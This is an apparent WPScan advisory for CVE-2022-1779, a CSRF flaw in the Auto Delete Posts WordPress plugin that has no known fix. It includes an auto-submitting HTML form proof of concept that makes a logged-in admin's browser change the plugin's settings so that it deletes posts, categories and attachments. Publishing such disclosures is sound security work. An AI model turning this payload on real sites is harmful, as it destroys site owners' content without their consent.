WordPress Plugin Vulnerabilities

Auto Delete Posts <= 1.3.0 - Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and delete specific posts, categories and attachments at once.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=auto-delete-posts.php" method="POST">
    <input type="text" name="DelPostType" value="7">
    <input type="text" name="DeleteAttachments" value="9">
    <input type="text" name="DeleteCategory[]" value="1">
    <input type="text" name="PerPostOrSite" value="5">
    <input type="text" name="PostAction" value="2">
    <input type="text" name="PostAge" value=" 1">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
auto-delete-posts
No known fix

References

CVE
CVE-2022-1779

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
45117646-88ff-41d4-8abd-e2f18d4b693e

Timeline

Publicly Published
2022-05-23 (about 1 years ago)
Added
2022-05-23 (about 1 years ago)
Last Updated
2023-02-15 (about 1 years ago)

Other

Published
Title
Published
2023-04-18
Title
Clock In Portal <= 2.2 - Holidays Deletion via CSRF
Published
2022-06-02
Title
HTML2WP <= 1.0.0 - Arbitrary Settings Update via CSRF
Published
2014-05-06
Title
Search Everything 8.1.0 - options.php Unspecified CSRF
Published
2024-04-05
Title
Nudgify Social Proof, Sales Popup & FOMO < 1.3.4 - Cross-Site Request Forgery via sync_orders_manually()
Published
2024-04-05
Title
WordPress Tooltips < 9.5.3 - Cross-Site Request Forgery